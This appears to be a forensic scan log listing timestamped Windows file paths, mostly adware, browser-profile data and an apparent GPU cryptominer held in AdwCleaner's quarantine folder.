      Fuzzy  . . . . . . : 116.0
      Forensic Cluster
         -2.4s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D19933300.log
         -2.4s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D18F34700.log
         -2.1s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\
         -2.1s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\LICENSE.txt
         -2.1s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\openweb.bat
         -2.1s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\SnareWindowsInstallSupport.dll
         -2.1s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\stopweb.bat
         -2.1s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\s_32.ico
         -2.1s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\WinSnare.dll
         -1.9s C:\AdwCleaner\quarantine\files\mvmfgnrbrmdbsjisivmhfrvdpvtlbouw\
         -1.9s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\
         -1.9s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\BITB16.tmp
         -1.9s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\
         -1.9s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\Report.wer
         -1.8s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\
         -1.8s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\BITB27.tmp
         -1.8s C:\AdwCleaner\quarantine\files\lvghxrkdvjdmjauuvlqiouualgvwchnk\
         -1.7s C:\AdwCleaner\quarantine\files\atsifbjehqqalokjotexydyeaawktlln\
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies-journal
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data-journal
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\001180cbc33c583f_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\02cdb733b079655d_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\08bc571418449ead_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\092f95ee9c1fc61c_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ad89b7fc5facf78_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0e02ff08b4002e57_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed73590870cfbd2_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed7399215f555d7_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ef5b10d79d9f0cb_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0fc3db66b9cbe75d_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1b72c2d37a2af109_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1dff67c9badf383d_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1e20774a42d716f3_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1f2ec90a78c46fdf_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2009bcf78a35d470_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\20ba89671f087fc1_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\234986793e71f265_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\26968e7a0c71776d_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2819c5233c1f77b4_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2ac381ccd53e2ce0_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2b11e2e523e5d524_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3082972055161e5d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3a977894dc0fcd39_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\442182c02ee0a243_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5125b9f58b582f46_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\593d0e1547012291_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5ede7465ad814101_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66928cc3398bdbc9_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66e510668b4796e9_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\6e2284174f43f7b0_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\711f9f610e35a8b6_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7150bac3e922a373_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7589f80f2ddeab29_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\775e37b82f99c13c_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7acdc9382bf6b139_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7d8cebaadfd53fbf_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7ecc93dfade6cf4e_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8326a92c0f293bc4_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\83a226c1379f7a18_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\86850034110cf1c4_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8d9b27c428a8f6a3_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8f60e69a4afd6f60_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\95ff98c7e9c1b8a3_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a1f309cd5a3eb6fa_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2719229322771c8_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2e6c4ddc62e67a7_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b07d05bc07d9c08b_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3986aa6d1a5b1ca_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3edef432256edd5_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b48454e7eeb33014_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ba7c73f14dafe451_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bd48447363dfb226_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\be189d201694bf89_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bfbe9938bbb38577_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c0676a458818319d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c3329b5e71fb9773_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c487316b1c7eb401_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c8bff37e9d993e8c_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c94b3024dfacfceb_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c9efb04ec241100a_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd31a5585d55d245_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd87b6402756547b_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cda276472aafd1d9_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cdd7d0e76bb75c18_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ce8699f098de9a28_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d19a15ac54bfa3ba_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d652598e0bff0a74_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d85bf4971be98d9f_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dc7c883ebdb4ce43_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dd1fa8967c9eedf1_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\e1548e7879784820_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f4beaede20fc0699_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f552ab47376f113e_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f74a8c1655500d73_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fbef9ceaf336383d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fddd11ea475c5135_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\the-real-index
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage-journal
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage-journal
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\backup6.bin
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\German_pcp.dat
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-12-2017.log
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-13-2017.log
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\voice.wav
         -1.2s C:\ProgramData\NVIDIA\MessageBus_5528_0x667E90.log
         -1.1s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\
         -1.1s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\em.exe
         -1.1s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\eng_em.ini
         -1.1s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\French_em.ini
         -1.1s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\German_em.ini
         -1.1s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound0.ini
         -1.1s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound2.ini
         -1.1s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\isxdl.dll
         -1.1s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\japan_em.ini
         -1.1s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-12-2017.log
         -1.1s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-13-2017.log
         -0.9s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\
         -0.9s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra-uninst.exe
         -0.9s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\
         -0.9s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\decredGeForce GTX 750 Tigw256l4tc4032.bin
         -0.9s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.conf
         -0.9s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.exe
         -0.9s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\msvcr120.dll
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\start.cmd
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\aes_helper.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake256.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw256.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\cubehash.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\darkcoin-mod.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\decred.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\echo.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\fugue.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl256.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\jh.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak1600.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\luffa.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2re.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2rev2.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2v2.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\neoscrypt.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shabal.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shavite.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\simd.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein256.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\vanilla.cl
         -0.7s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\
         -0.7s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\WinSAP.dll
         -0.6s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\
         -0.6s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\WinSnare.dll
         -0.6s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\
         -0.6s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\
         -0.6s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\sma.exe
         -0.6s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci32.dll
         -0.6s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci64.dll
         -0.6s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi32.exe
         -0.6s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi64.exe
         -0.6s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe
         -0.6s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe
         -0.6s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smw.sys
         -0.5s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\
         -0.5s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\smhe.js
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\Config.json
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe.config
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.dll
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.Linq.dll
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.xml
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\SQLite.Interop.dll
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\SQLite.Interop.dll
         -0.3s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\
         -0.3s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.HP
         -0.3s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.NT
         -0.3s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\snp.sc
         -0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\
         -0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Config.xml
         -0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe
         -0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe.config
         -0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\
         -0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe
         -0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe.config
         -0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\conf.config
         -0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Config.xml
         -0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\DanDubdom.bin
         -0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll
         -0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe
         -0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe.config
         -0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Freshing.dat
         -0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Groovestrong.dat
         -0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.d.dat
         -0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.dat
         -0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Jaystock.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\md.xml
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Ranzumstring.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Singlestock.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\String-Tax.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\TrioDex.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\uninstall.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\White-Fan.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\WhiteDox.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ZamIng.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ondemand\
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Bluedax.bin
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\conf.config
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Config.xml
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Driphotity.bin
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Duosolodax.bin
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Fasefax.bin
